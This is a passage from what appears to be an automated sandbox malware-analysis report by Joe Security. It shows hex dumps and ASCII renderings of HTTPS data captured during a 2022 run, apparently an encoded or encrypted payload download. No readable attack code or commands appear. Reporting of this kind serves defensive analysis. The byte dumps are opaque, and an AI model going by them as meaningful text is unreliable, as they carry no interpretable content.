b9 98 35 21 08 77 0c 12 ab 15 c1 09 c1 ce ee 12 61 8c 46 49 0a c3 1e de d2 4a 04 ca 3e 3b 88 37 ca ca ca 0c 12 ab bc
c1 09 c1 0e ee ce 12 61 8c 46 47 0a c3 1e de 12 4a 04 ca 3e 39 b9 98 35 0c 12 ab be c1 90 b7 8e 52 ca ca ca 95 28 91
f9 c1 8a 8b c1 b6 b9 8e 56 89 20 8d 69 ff bf 83 56 c1 bc c3 b3 9c ef d2 ca ca ca 29 db 30 db bf 7b c6 69 8a 8b 32 41 ac 77
ca 2e 35 fa 2e bf ea 45 80 7b 9c bf 7b be 69 8a bf 7b c2 45 80 7b 9e f7 b2 ce 3e 4b c3 8b 56 d7 06 bf 0c ca b2 e7 4e c8
35 c1 7b 56 b2 9b 09 35 35 c1 83 be 07 2f af 39 b9 07 ca bb ff 46 65 77 69 8a c3 ab 9e 45 80 e0 bb 8a 48 da 45 80 a4 f7
21 ce c1 b3 c2 52 26 73 5c 35 7b c2 4a ac 45 c1 93 c2 52 1e
Data Ascii: FEEoa->H=7!y5!waFIJ>;7aFGJ>95R(V iV)0{i2Aw.5.E{{i{E{>KVN5{V55/9FewiEHE!R&s\5{JER

2022-07-25 13:50:54 UTC 133 IN Data Raw: ca 0c a5 3e 32 ca ca ca ca 35 35 35 35 3d ca ca ca 18 9b ab 3e 3c 97 36 ca 89 20 c1 a4 c1 ba c1 f9 c1 a0 b2

93 7b c8 35 c1 39 b2 4c 4c c8 35 c1 ba 21 51 c1 39 b2 f1 7f c8 35 c1 a0 61 9a c1 f9 b2 a6 81 c8 35 c1 39 b2 9b 4c c8 35
c1 ba c1 39 b2 66 7d c8 35 bb 8a 48 41 45 80 d0 f6 57 3c 09 f6 43 3e 05 28 91 f9 c1 8a 8b c1 b6 b9 8e b6 89 20 8d 69 11
bf 93 be bf 93 c6 4e 9c 3e d2 b9 8e ba b2 e9 04 c8 35 c1 2f 52 8b 31 c1 a2 c1 ab d6 69 8a 8b 32 d0 37 0c ca 2e 35 fa 2e
bf ea c3 7b c6 c1 0d b2 57 7b c8 35 b9 b3 c6 ca ab fe c3 8b c6 c1 90 b2 73 e1 c8 35 b9 b3 c6 ca ab ee 34 ca c3 8b be d7
42 52 0c ca b2 32 9b c8 35 c1 8b be bf ab b6 90 7b ba ca c3 83 b6 c3 7b c6 b2 61 bf c8 35 c1 7b d2 1a c1 83 c6 69 9c c1
f9 b2 d9 7e c8 35 bf a9 d6 69 8a 24 8f 8f 2e bf da 32 43
Data Ascii: >25555=><6 {59LL5!Q95a59L59f}5HAEW<C>( iN>5/R1i27.5.{W{5s54BR25{{a5{i~5i$.2C

2022-07-25 13:50:54 UTC 141 IN Data Raw: ca b2 19 5d c8 35 c1 bb ea 35 35 35 24 b2 11 bc 35 35 32 fe ea 0c ca 35 00 32 2a ea 0c ca c3 bb e2 35 35 35

84 39 ca ca ca b2 7d 5f c8 35 c1 bb e2 35 35 35 b2 46 f4 c8 35 c1 9a c3 bb e6 35 35 35 b2 d9 5d c8 35 c1 bb e6 35 35 35
1a c3 bb da 35 35 35 c1 d8 84 fe ea 0c ca b2 6c f2 c8 35 c1 bb da 35 35 35 b2 81 f4 c8 35 c1 9a c3 bb de 35 35 35 b2 3c
5d c8 35 c1 bb de 35 35 35 24 b2 34 bc 35 35 34 ca 34 37 d7 9e f9 0c ca 1a 35 4b c6 f9 0c ca 4e 8a ab 3d 69 8a d9 c6 f9
0c ca d7 a6 f9 0c ca c1 0a 42 bb 8a 3e de c1 4b a6 f9 0c ca c1 1c 46 39 3b 9e f9 0c ca b2 11 be 35 35 69 8a 24 8f 8f 2e bf
da 32 e0 ea 0c ca c3 bb da 35 35 35 84 04 ca ca ca b2 04 5b c8 35 f9 1f b6 53 c8 35 21 b2 c1 7b c2 95 28 91 c1 1b 93 f9
35 35 35 35 cc ca ca ca a9 9f ca ca 35 35 35 35 cc ca
Data Ascii: ]5555$55252*5559}_5555F5555]5555555l55555555<]5555$4554475KN=iB>KF9;55i$.2555[5S5!{(55555555

2022-07-25 13:50:54 UTC 149 IN Data Raw: c1 bb 86 c8 35 35 1a c3 bb 82 c8 35 35 84 6a 2e 0c ca b2 5c c6 33 35 c1 bb 82 c8 35 35 24 b2 d8 13 35 35 c3

bb 7e c8 35 35 84 72 2e 0c ca b2 40 c6 33 35 c1 bb 7e c8 35 35 1a c3 bb 7a c8 35 35 84 8e 2e 0c ca b2 95 c6 33 35 c1
bb 7a c8 35 35 24 b2 11 a6 35 35 c3 bb 76 c8 35 35 84 96 2e 0c ca b2 79 c6 33 35 c1 bb 76 c8 35 35 1a c3 bb 72 c8 35
35 84 aa 2e 0c ca b2 f6 c6 33 35 c1 bb 72 c8 35 35 24 b2 72 a6 35 35 c3 bb 6e c8 35 35 84 b6 2e 0c ca b2 da c6 33 35 c1
bb 6e c8 35 35 1a c3 bb 6a c8 35 35 84 da 9b 0c ca b2 2f 31 33 35 c1 bb 6a c8 35 35 24 b2 ab a6 35 35 c3 bb 66 c8 35 3
5 84 e2 9b 0c ca b2 13 31 33 35 c1 bb 66 c8 35 35 1a c3 bb 62 c8 35 35 84 f6 9b 0c ca b2 90 31 33 35 c1 bb 62 c8 35 35
24 b2 0c a6 35 35 c3 bb 5e c8 35 35 84 02 9b 0c ca b2 74 31 33 35
Data Ascii: 5555j.\3555$55~55r.@35~55z55.35z55$55v55.y35v55r55.35r55$r55n55.35n55j55/135j55$55f55135
f55b55135b55$55^55t135

2022-07-25 13:50:54 UTC 156 IN Data Raw: ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca

ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca
ca ca ca ca ca ca ca ca ca ca ca cc c3 0a ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca fc 49 c1 8a ca c3
0a ca ca c3 0a ca ca c3 0a ca ca ca ca ca ca ca ca ca 96 49 0a ca ca ca da ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca
ca ca ca ca ca ca ca ca ca ca f6 de 0a ca ca ca e2 ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca
ca 0a de 0a ca ca ca ea ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca 2a de 0a ca ca ca f2 ca
ca ca ca ca ca ca ca ca ca ca ca ca ca ca
Data Ascii: II*

2022-07-25 13:50:54 UTC 164 IN Data Raw: ca 16 13 cc ca 2c 13 cc ca 40 13 cc ca 54 13 cc ca 66 13 cc ca 7c 13 cc ca 90 13 cc ca 9c 13 cc ca aa 13 cc

ca bc 13 cc ca d4 a8 cc ca e4 a8 cc ca f2 a8 cc ca 06 a8 cc ca 1e a8 cc ca 2c a8 cc ca 44 a8 cc ca 56 a8 cc ca 68 a8 cc
ca 76 a8 cc ca 86 a8 cc ca 9a a8 cc ca ac a8 cc ca ca ca ca ca c8 a8 cc ca da 15 cc ca e8 15 cc ca ca ca ca ca 04 15 cc
ca ca ca ca ca 1a 15 cc ca 2a 15 cc ca ca ca ca ca 44 15 cc ca 56 15 cc ca ca ca ca ca 74 15 cc ca 8a 15 cc ca a0 15 cc
ca b6 15 cc ca ce aa cc ca e4 aa cc ca fa aa cc ca 10 aa cc ca 22 aa cc ca 36 aa cc ca 48 aa cc ca 56 aa cc ca 66 aa cc
ca ca ca ca ca 7e aa cc ca 94 aa cc ca aa aa cc ca be aa cc ca d4 17 cc ca e6 17 cc ca ca ca ca ca fc 17 cc ca ca ca ca
ca 18 17 cc ca ca ca ca ca 32 17 cc ca ca ca ca ca 64 a0
Data Ascii: ,@Tf|,DVhv*DVt"6HVf~2d

2022-07-25 13:50:54 UTC 172 IN Data Raw: 73 b9 73 cf 73 d3 73 d7 73 db 73 df 73 e3 73 e7 73 88 73 c8 73 3a 08 ad 08 58 08 5c 08 60 08 64 08 68 08 6c

08 76 08 19 08 1a 75 8d 75 a5 75 a9 75 ad 75 b1 75 b5 75 b9 75 bd 75 5e 75 09 75 ca ca ca ca 37 ca 26 37 ca ca 0a fa
34 fa 17 fa 59 67 81 67 db 67 ac 67 31 67 e0 fc 5e fc e9 fc ed fc f1 fc f5 fc f9 fc fd fc 01 fc 05 fc 09 fc 0d fc 11 fc 15 fc 19 fc
1d fc 21 fc 25 fc 29 fc 2d fc 31 fc 35 fc 39 69 3d 69 ea 69 6a 69 0d fe 11 fe 15 fe 19 fe 1d fe 21 fe 25 fe 29 fe 2d fe 31 fe
35 fe 39 6b 3d 6b 41 6b 45 6b 49 6b 4d 6b 51 6b 55 6b 59 6b 5d 6b 61 6b 5c 6b a2 00 c6 00 9b 6d 72 6d ac 6d 31 6d 49
02 5c 02 60 02 64 02 68 02 6c 02 70 02 74 02 78 02 7c 02 80 02 84 02 88 02 8c 02 90 02 94 02 98 02 9c 02 a0 02 a4 02
a8 02 ac 02 b0 02 2b 02 fc 6f 12 6f 28 6f 3e 6f
Data Ascii: sssssssssss:X\`dhlvuuuuuuuuu^uu7&74Ygggg1g^!%)-159i=iiji!%)-159k=kAkEkIkMkQkUkYk]kak\kmr
mm1mI\`dhlptx|+oo(o>o

Copyright Joe Security LLC 2022 Page 32 of 74

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:50:54 UTC 180 IN Data Raw: 57 4e 25 25 c4 b0 1f c2 c8 ae 35 ae 35 aa c8 1f 31 23 19 ae 23 c2 17 84 27 33 02 c8 c2 b0 2f ae 33 ba 23 2f 1f

b4 b8 21 19 23 c6 31 23 b4 ba 2f 27 27 25 25 c2 b0 1f c2 c4 1d 35 ae 35 aa c8 1f 31 23 19 ae 23 c2 17 21 27 33 c2 c8 c2
b0 2f ae 33 ba 23 2f 1f b4 b8 21 19 23 c6 31 23 b4 ba 2f 27 27 25 25 c2 b0 1f c2 c4 1d 35 ae 35 aa c8 1f 31 23 19 ae 23
c2 17 21 27 33 c2 c8 c2 b0 2f ae 33 ba 23 2f 1f b4 b8 21 19 23 c6 31 23 b4 ba 2f 27 27 25 25 c2 b0 1f c2 c4 1d 35 ae 35
aa c8 1f 31 23 19 ae 23 c2 17 21 27 33 c2 c8 c2 b0 2f ae 33 ba 23 2f 1f b4 b8 21 19 23 c6 31 23 b4 ba 2f 27 27 25 25 c2
b0 1f c2 c4 1d 35 ae 35 aa c8 1f 31 23 19 ae 23 c2 17 21 27 33 c2 c8 c2 b0 2f ae 33 ba 23 2f 1f b4 b8 21 19 23 c6 31 23
b4 ba 2f 27 27 25 25 c2 b0 1f c2 c4 1d 35 ae 35 aa c8
Data Ascii: WN%%551##'3/3#/!#1#/''%%551##!'3/3#/!#1#/''%%551##!'3/3#/!#1#/''%%551##!'3/3#/!#1#/''%%551##!'3/3#
/!#1#/''%%55

2022-07-25 13:50:54 UTC 188 IN Data Raw: a3 ec 87 4f 2b 1a 95 d1 4d e9 e8 2c c4 80 05 fe eb 77 1a 7a 5f 11 45 68 60 11 19 20 51 d7 90 6e 97 d2 0d 5c

da 95 de e4 44 3a 17 c6 c9 32 e4 b8 f5 8e 3d 1d b7 d3 2c 59 64 a5 7b 6a 6a 57 e5 3e a8 ec 92 bd 05 32 17 14 57 a5 74
03 95 2f 08 f7 c8 e6 a9 81 11 6a e5 00 ac e3 38 9e d3 ff 7d 98 2a 89 4c 9d e3 cf 7f 78 3d 26 a2 79 60 90 82 b3 08 1e fa
86 5f 09 ba 5f a0 1b fb 27 37 91 75 ad a6 ca 08 08 e4 be 53 b1 c8 53 0f 28 3a 88 af 56 4f a0 dc 55 eb 99 58 b2 72 dd 46
2c de 35 e0 3e ab 20 7a 0d 85 eb 9a 68 fd c1 8f 5d 35 27 2b bc 70 87 b7 5e 96 03 79 e5 36 4c 33 a8 67 b5 c1 d0 b8 84
06 a2 b9 90 80 28 48 cc 2a f7 b2 00 87 03 72 55 ec b0 92 f6 10 69 bf 0f e9 dd c2 d7 e3 0a da ce e5 7b 0d 5f dc 5f 2b 86
d0 02 bf 7e 68 2f f0 2b c2 69 da 60 05 64 95 ab 81 e7 e4 d9 a0
Data Ascii: O+M,wz_Eh` Qn\D:2=,Yd{jjW>2Wt/j8}*Lx=&y`__'7uSS(:VOUXrF,5> zh]5'+p^y6L3g(H*rUi{__+~h/+i`d

2022-07-25 13:50:54 UTC 195 IN Data Raw: 8e f3 50 af 9e ea 47 5c 9f 2e ed de f0 4a cb ee 1e 1c d7 15 f7 da 3d 7c 84 89 f3 3b 26 3c 25 52 e1 6d 12 93 8f

03 75 2d 7a e6 15 a3 e7 4e 50 54 ab 14 a0 b8 a2 d7 2a aa 22 c2 17 d6 52 96 88 44 e4 89 2d 2d 80 92 dd 51 f1 71 57 1b
8a 82 5c c8 56 65 5c e8 1c 94 30 fc 6e bc 1a f6 cd 1b e2 86 53 0e 68 df 87 94 83 fd 1f 3f 72 f8 c8 30 9f b5 6c 29 6e fc f2
64 f0 8b b1 e1 bc 6e 7c 7f b4 4f 0f ce 53 4b 2b 9f 72 ba 03 d9 09 0a f0 b8 a3 5a 06 49 66 bc b6 2f 04 f4 bc 32 8f de a6 5a
71 03 cc 16 e8 5d a2 8f 84 c7 ba 5f 12 2a 05 d3 cd 88 b5 12 50 0d 39 9d 0c c7 22 0c 5a 81 75 54 1f 1f ca 17 16 b9 17 92
97 de bb de aa 7b d1 ed 5c 2e 1c 71 3d da c1 3f e2 a0 46 7e 8b 5b 53 67 cc 46 82 ea 26 4f e0 bb 73 34 f0 98 58 bf 2f f0 f7
c1 a8 f3 a2 1c f7 b2 66 82 16 18 c2 d6 6a 13 f6
Data Ascii: PG\.J=|;&<%Rmu-zNPT*"RD--QqW\Ve\0nSh?r0l)ndn|OSK+rZIf/2Zq]_*P9"ZuT{\.q=?F~[SgF&Os4X/fj

2022-07-25 13:50:54 UTC 203 IN Data Raw: be 74 97 73 a7 90 42 50 3b fd 78 a0 6a 84 83 02 9c e4 e3 cb 1e ed 2e 5f 96 a8 a1 b9 f0 e2 5b 10 2e 62 a1 85

f9 71 75 a1 91 a5 0e 24 88 db 8a 3c 4c 9e 10 5e d6 51 67 9f d2 27 22 3d 07 1c 87 9a 5a 77 b3 e4 88 92 64 bd 46 f9 eb b5
59 19 92 54 bd 19 8f b4 db 14 06 e4 6a 3d e2 3e 96 f4 ca 0d 6a a0 4a 0b 9c 78 88 c4 47 16 b6 00 6d 67 8c 59 06 78 05
68 0b 46 11 a5 46 5d 31 0e fa e2 9b 8b 12 46 83 0b 09 a9 f1 56 e4 d8 ab 88 07 b6 67 61 7c 6c 50 95 fd 81 b9 22 90 fd 2c
c5 2a 38 a3 73 a1 88 06 25 2e 53 9e 75 25 73 bb c4 d0 5f 5a 3d a9 55 7c ef 7d f2 da 89 fe ee 9c 92 00 f7 be ee 71 a4 77
f9 ce fb 27 b9 bf a8 a4 db c9 fe fd eb 21 04 28 80 68 19 04 95 ad 4b 5a 0a d8 a7 a6 fc fe af e4 38 40 18 e7 7f f2 b1 a3 4f
b9 12 46 48 9e 2e 89 c9 36 3e 7d c0 92 ce cc be 3b 04 42
Data Ascii: tsBP;xj._[.bqu$<L^Qg'"=ZwdFYTj=>jJxGmgYxhFF]1FVga|lP",*8s%.Su%s_Z=U|}qw'!([email protected]>};B

2022-07-25 13:50:54 UTC 211 IN Data Raw: d6 fd ce 5c 8d 23 ae 69 23 1e de 32 3d cd 99 01 1b 24 75 17 d9 32 c2 b5 f8 a7 c1 a0 db 23 69 3f a7 82 c2 e3

50 b8 91 a3 27 a7 7e 6f d0 27 3c 72 c7 45 20 db f0 14 52 07 e1 52 18 cf 4e 45 f6 6c 47 08 9a bf e9 39 a5 95 75 7a 80 1f
fe f3 21 bf d6 1a bb 7e 7c ba dc 67 71 05 3e e9 a9 09 4e 16 ce d3 72 89 a7 88 90 b9 b1 2c 08 d5 3c 0c 36 01 aa 6f 27 77
20 3b 23 a3 a0 aa 6c 0f a5 fd 1f 9d 8f b3 50 66 fd 76 fc 2d 98 ef 72 0f a7 01 d9 4f b7 9d 63 ff b1 e9 07 64 31 ef e1 28 b2
58 7c 2b b2 11 e2 79 4e fa 2f e9 27 e4 77 44 60 f6 18 5d 64 80 b4 ce c4 ee f5 8b 1e 88 89 53 60 b4 4d 33 68 9a 41 a5 91
ad a3 f4 a2 cb 6e 99 4e 38 69 b1 df 64 b0 de 08 d2 33 66 8f bb 78 b9 63 80 3c 3b 88 4f d3 ab f8 ed ff 89 66 1d df e2 ab d3
de e2 d2 c2 09 ca bb 22 d4 05 02 4f 79 96 3a 5e 27
Data Ascii: \#i#2=$u2#i?P'~o'<rE RRNElG9uz!~|gq>Nr,<6o'w ;#lPfv-rOcd1(X|+yN/'wD`]dS`M3hAnN8id3fxc<;Of"Oy:^'

2022-07-25 13:50:54 UTC 219 IN Data Raw: 31 d0 df b4 7f a4 01 39 1a 4f e3 6b 65 04 c0 a0 d2 f4 15 e6 ea 58 b7 80 44 14 da 23 b8 7d 69 20 d2 79 6a 8d

89 98 28 0b a2 f9 ce e9 48 e4 36 9f 7b 37 cf 9b 84 5a c2 c0 15 d2 af ef 51 43 62 aa 72 dc 63 3b 3e 74 c6 c1 70 b2 98 d9
b6 0b 67 a1 97 4e ac 58 bc 30 cb 91 9a 70 c6 c1 4a e6 10 62 b5 e5 3d ed a8 48 33 da ca e8 16 ac 5b e7 d7 88 c4 ae f1
00 1a 2d f6 e6 70 62 6f 2a 29 e9 0d 94 c4 82 bd 2b 77 92 34 af d4 2d a1 79 a1 5e 4c 18 97 2d 7d 92 c3 0f f2 a2 8a 22 72
4f e9 91 8c 5a 28 6f 19 10 ff bb ea 2c 73 9f 5a da 71 b3 ce 49 af cb 0a a3 21 0b a4 ed ce 52 48 2b f7 c0 6e 97 24 8e 36 19
68 a5 5c 07 67 90 0c 0e b2 17 00 63 6f 4c d5 2a 56 d1 40 de 76 c2 a2 3c 2c 2b cf 91 1e 84 f1 80 34 c7 0a cf 86 b8 c2 fc
a7 7d 5f 2e fc 9e 6e c2 a9 9d fc 15 77 aa cd 48 ac 43 e1
Data Ascii: 19OkeXD#}i yj(H6{7ZQCbrc;>tpgNX0pJb=H3[-pbo*)+w4-y^L-}"rOZ(o,sZqI!RH+n$6h\gcoL*V@v<,+4}_.nwHC

2022-07-25 13:50:54 UTC 227 IN Data Raw: c9 ed 60 dc 9c 23 9b 59 eb 12 ce cc a8 7b a2 74 a3 ad 62 05 46 95 db 0d c8 cf 4d 74 52 25 74 79 8a 3b 43 8b

01 88 82 ae d5 2b 0d 81 70 2a 3d 79 18 db 6d 13 3d e1 b9 68 ad f4 9e a5 6f 27 93 17 16 1b 14 2c e2 0c c5 60 c0 41 24
48 92 03 ca c9 f7 8b d9 09 2e 7d 23 5a a4 d8 6c d0 2e 34 6a 27 79 24 3a ec 7a 4f 87 31 a7 8f 28 67 24 2b 36 7a a9 bb 9a
07 18 4d 4f da ed 58 8b ba 45 31 e3 41 fb 4b 1c 2e 14 01 09 74 0d 07 15 85 41 2a e5 42 26 fd 23 38 b0 93 87 1a 75 79
d6 13 1c ac f4 14 8c 16 7a 74 3c 50 b9 aa 57 ed 25 77 48 af 8a a5 07 01 ab 41 5b 4f 04 fc 90 8c 9f a2 52 59 fe 66 d3 c2
98 ac 71 97 f0 fb e7 7b 2b 9d cd c8 cf 71 80 b1 d2 ff bb a1 02 ed 85 58 4e ab 6c 97 de ee 8a 4d f8 fb 8e 0e ad 6a 13 58
40 48 5e cb c5 e0 51 58 99 40 07 99 15 9a f3 df 0e 3b 03 33 b6
Data Ascii: `#Y{tbFMtR%ty;C+p*=ym=ho',`A$H.}#Zl.4j'y$:zO1(g$+6zMOXE1AK.tA*B&#8uyzt<PW%wHA[ORYfq{+qXN
lMjX@H^QX@;3

2022-07-25 13:50:54 UTC 235 IN Data Raw: 8c 34 ff 3f b0 8c 01 61 3d 6a 7e f8 6d c8 a7 49 7c d2 c7 97 84 a1 7f 92 c1 98 33 e0 92 6d 24 44 2b 87 54 c0 06

5e a4 5e 37 2c 44 8f a1 00 2e 80 7a 9d e6 6d 35 0c 85 da 82 81 d4 b6 a1 a9 12 3a 77 e4 e4 8a 0b e6 3b 22 a0 61 27 37
e7 63 77 5f ed dd 26 d3 12 cd 4b 17 79 28 d2 e4 da 04 09 30 68 b2 28 30 5c e8 53 15 af b7 36 dd ed 35 1a 62 3e 81 02 fd
b6 53 45 53 da ee 76 8e ae b4 ea b9 4f 94 a4 09 2b fc b1 a3 76 1d 77 0b 9d 81 b4 21 df 9c 34 8b 09 0f b1 18 03 f1 ad 5c
db 90 64 9f 18 9b 6b cd 92 dc 96 f6 a6 00 aa fb 71 71 eb 76 3b 39 7c 02 2e 24 d6 bf 68 52 7f 84 22 54 63 52 94 96 0c 64
28 38 d9 fd ab 1d fc 1f b9 93 be df a7 61 a8 08 69 b6 e4 d0 06 9c 53 ee 8d 88 c1 39 7a 44 fc 06 65 0a 29 da 58 f1 43 b2
5d a3 15 c4 53 6d 17 53 af 80 3b b0 2c 0b 9e c3 be 31 5c
Data Ascii: 4?a=j~mI|3m$D+T^^7,D.zm5:w;"a'7cw_&Ky(0h(0\S65b>SESvO+vw!4\dkqqv;9|.$hR"TcRd(8aiS9zDe)XC
]SmS;,1\

2022-07-25 13:50:54 UTC 242 IN Data Raw: e5 ed a4 ee 69 a9 8b 41 79 2c 42 3c 78 20 82 57 77 c8 d9 0b 8d d4 1d 88 37 cb 26 5f ea 15 d6 8d cc 35 f9 fe

15 62 51 5e 71 5d e0 58 d2 91 85 41 f4 d8 56 6b de 66 6f 72 9f 09 04 e1 2d f9 1c 10 6c ea fc e1 cf 5f 2e 10 e6 ca ed d6 aa
74 20 39 6f e4 2a c2 07 c7 e3 64 ca 39 fd 42 39 5a 57 9b 74 bd cd 4a 3c d8 7a 44 f7 6a 3a 27 92 ec 50 79 b5 81 c5 1f 4f
8e e2 f2 07 ed ee c0 b2 6c 13 17 b0 50 7b 63 bd 9f b3 16 cd 0e 5e 7d 53 c8 34 c2 26 33 f2 bc 33 c1 3f be cb a9 58 81 ae
1c 2d 22 43 20 ff 47 ee 29 99 82 a5 d2 40 52 bc d7 b8 b2 c9 d9 48 d7 ef dc 9a f6 46 26 c4 a4 83 55 12 5e 99 bb f7 cc 73
c6 be 2e 5f e5 f2 df 42 77 b8 6d 72 60 92 ef b5 86 8f 54 42 23 d4 44 0d bc aa 9d 8f 51 fd 1e a1 81 7e 36 3b 15 54 3a ce
37 19 89 e2 2e ff be f9 7c 4d ba d2 85 f8 cb 0a 36 a2
Data Ascii: iAy,B<x Ww7&_5bQ^q]XAVkfor-l_.t 9o*d9B9ZWtJ<zDj:'PyOlP{c^}S4&33?X-"C G)@RHF&U^s._Bwmr`TB
#DQ~6;T:7.|M6

Copyright Joe Security LLC 2022 Page 33 of 74

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:50:54 UTC 250 IN Data Raw: 2d c5 65 63 99 dd b1 b5 9f f9 0e 41 31 fe 0f 50 67 db 6d 42 44 78 7c d0 40 0b 1b a8 da b9 d6 13 d9 f3 37 34

0a 5c 24 20 60 36 3f bb 34 f1 75 d9 b1 6c 36 1b bb c3 2a 54 a0 94 57 bc 58 4e a6 f2 ff a6 9c 2a 80 15 3e bd e8 2d e7 4a
e1 f0 f9 6f b1 2b 75 a4 b3 75 81 b4 59 07 93 39 1c c0 ae 3c a7 91 4d 1a 69 65 2d a5 15 7d e6 aa f6 2f 65 26 95 4c 73 b1
e0 37 f0 c2 90 bb d4 4e 62 e6 c0 01 a6 e9 98 13 16 7e 14 d7 d5 a1 9f a2 47 29 e6 ad 7e 12 5f 48 df 0a 34 ce 8e dd 3a 81
d5 52 0c 60 91 3c 4b 6e 73 9b b6 bf 9b fd 45 73 d8 b7 33 51 f1 77 b6 83 5e e9 72 f5 2e 1f 40 84 57 c2 96 bf 43 7e 83 e7 df
e6 39 be 5a ec d7 19 85 5b 51 b5 8c ac bb b1 10 14 d5 2d b8 4a 02 77 0d 3f ff 2d fd 65 a2 4c 13 d6 40 d7 33 36 15 ba 85
f9 bd 8c 0e 7e 96 d3 69 35 22 71 05 06 8b 29 0c 17 29
Data Ascii: -ecA1PgmBDx|@74\$ `6?4ul6*TWXN*>-Jo+uuY9<Mie-}/e&Ls7Nb~G)~_H4:R`<KnsEs3Qw^r.@WC~9Z[Q-Jw?
-eL@36~i5"q))

2022-07-25 13:50:54 UTC 258 IN Data Raw: 13 12 94 7c 5f 62 5e 1d fb 62 b8 8b f2 7d f4 23 ac d7 79 25 30 bd 90 9d 35 0c 02 71 f6 f6 e5 c7 77 04 74 cd 76

02 f1 f7 fe a9 e4 99 f6 cb 2b 1e 97 84 22 35 47 7f 13 af 75 4c 82 1e ad f8 37 67 2c c3 25 c1 37 3a ba fb 1e 56 5f 57 a9 26
d3 17 46 18 d8 24 d9 c1 e1 83 8c bf 99 13 5d 6c 99 24 ae 73 d6 58 01 18 15 52 17 d7 e9 54 a5 4f a5 cb 6b b1 72 7b fb af
e6 bd f8 19 0a 8c db 8c c6 ad 00 d9 42 07 86 4d 97 99 5b 8a 5f 32 5e 2b 66 e1 81 c2 9b 59 3a 0e 5f 20 c6 15 40 b2 f6 94
94 b3 7e ed 2b 40 b6 8f 0c 8a d6 68 c1 98 96 db 96 2b 04 21 e9 95 6c c2 8a ae 54 e4 90 8b b4 a9 29 03 77 23 46 35 55
7c 5f 03 68 91 6e a2 ba b6 17 03 19 31 7e df be 02 7d df d7 ee 17 78 ab 1e 5c f3 dd 8e 89 51 be 0a 51 91 fe fd ce 1e a4
af c8 41 8d 80 90 a9 bd 2a f1 79 75 f5 a3 23 06 85 d2
Data Ascii: |_b^b}#y%05qwtv+"5GuL7g,%7:V_W&F$]l$sXRTOkr{BM[_2^+fY:_ @~+@h+!lT)w#F5U|_hn1~}x\QQA*yu#

2022-07-25 13:50:54 UTC 266 IN Data Raw: b3 ac 10 56 9c 6f f7 05 cd ea 43 49 56 16 b0 2e d9 3d c3 db 1b c7 2a 1b 0a 60 50 3b d9 d5 f0 33 f6 3c 34 75

e5 6e b3 a0 30 b9 2c 01 6c 49 5e d4 9e 72 e7 c2 9c fa 27 ce fc e1 da 9f a2 0c cc 7d 5d 9a e9 ad 26 0b 96 79 9a e9 85 6b
17 29 a8 20 aa ac 56 87 5c c0 d3 54 53 83 37 c0 e6 ef 9f 10 1f 7a 0c fe c4 df a2 19 35 22 4b 40 ac bf df 81 dc e2 0d b6 07
1e 19 ff 7a 0b 1e e8 08 92 97 25 f2 ec c2 63 56 45 42 1b c5 0b f4 9a 40 97 e8 be bc bd f7 e8 aa 38 77 ff 72 d0 ec 71 1a
3b 8a a3 8a c4 45 c6 39 57 94 6d f2 ef 28 51 af 1e 33 b4 ab 44 bb 38 80 a5 89 58 d6 bd 81 a6 23 a7 f9 28 26 31 fb 8a 62
3b 24 fc 54 e8 53 bb 02 93 e0 68 c4 ef 70 54 2d 39 86 62 7d 5c 9e c4 5b a3 5a 9a bd 3f 8b 20 af 0a 87 fb 51 6d 48 98 06
6a f8 87 fd d2 70 ee a3 0c 04 49 b0 6b 74 fb be 60 9a
Data Ascii: VoCIV.=*`P;3<4un0,lI^r'}]&yk) V\TS7z5"K@z%cVEB@8wrq;E9Wm(Q3D8X#(&1b;$TShpT-9b}\[Z? QmHjpIkt`

2022-07-25 13:50:54 UTC 274 IN Data Raw: f0 c8 f0 79 17 7f e2 47 73 2c 73 3c 2d 37 9d 9b 47 0d 5c 8a 16 37 97 55 d0 26 c4 b5 98 97 aa d9 6a 55 e3 6a

a0 a2 93 35 f6 06 50 6b 09 58 e3 c9 e0 b9 09 16 94 86 20 6e 13 59 1e 79 97 1a 13 e0 30 20 01 75 4b 1f a7 ba 8f ff d3 17
98 40 bb 80 93 e9 8a a7 2e e7 d9 0f 93 8f 3b b0 3a ec 01 ed 5f b9 84 02 41 6b b4 49 4b 57 e5 2a ce ad 05 5a ec 91 cd 80
f3 17 2e a5 ab eb 0a 04 9f 00 e7 4e 22 06 0b 6e e8 b3 9f 6d 74 31 c5 f7 0f e6 b3 ae 40 4e 23 b4 a1 b4 91 4f d7 8e 07 5e
39 5a 8a 68 06 67 27 58 62 1b 2a 6e 06 04 30 5b 6a 46 66 42 0a 99 22 a1 76 55 8d c2 31 48 e0 59 fa b5 09 2b 34 37 22
50 62 0d e0 1d 5c 79 46 0e 44 96 30 3a 8a c1 0e 88 a2 20 bf ad 9f 4a d4 22 2f 0b 1d ae e1 b9 03 63 01 4d d0 e5 19 59
33 95 4a 7b 73 12 b1 28 7e 86 28 1c de ea f3 01 e5 6b 9d 8e 0d
Data Ascii: yGs,s<-7G\7U&jUj5PkX nYy0 uK@.;:_AkIKW*Z.N"nmt1@N#O^9Zhg'Xb*n0[jFfB"vU1HY+47"Pb\yFD0: J"
/cMY3J{s(~(k

2022-07-25 13:50:54 UTC 281 IN Data Raw: 2d 25 e7 c2 9e 74 cd 98 63 48 a6 50 a9 74 b7 b8 82 20 f5 88 29 0d 64 b6 bb 7d 69 3b d2 72 82 34 95 1e 7a 15

3d ee ba 39 1d 6a ea ba 7a c1 ea 13 82 1f e4 d2 45 57 7b 3b dc 47 c0 fc 2e 3b a3 18 0a db be 37 88 f2 a7 19 41 05 37 2f
5e 44 76 5f c4 51 e6 ec f4 dc ab 2d f2 00 41 f4 36 d2 06 4e a2 f9 e8 2e da 13 b6 48 8c b6 f4 12 28 2b 74 56 e6 d2 8f 3f 27
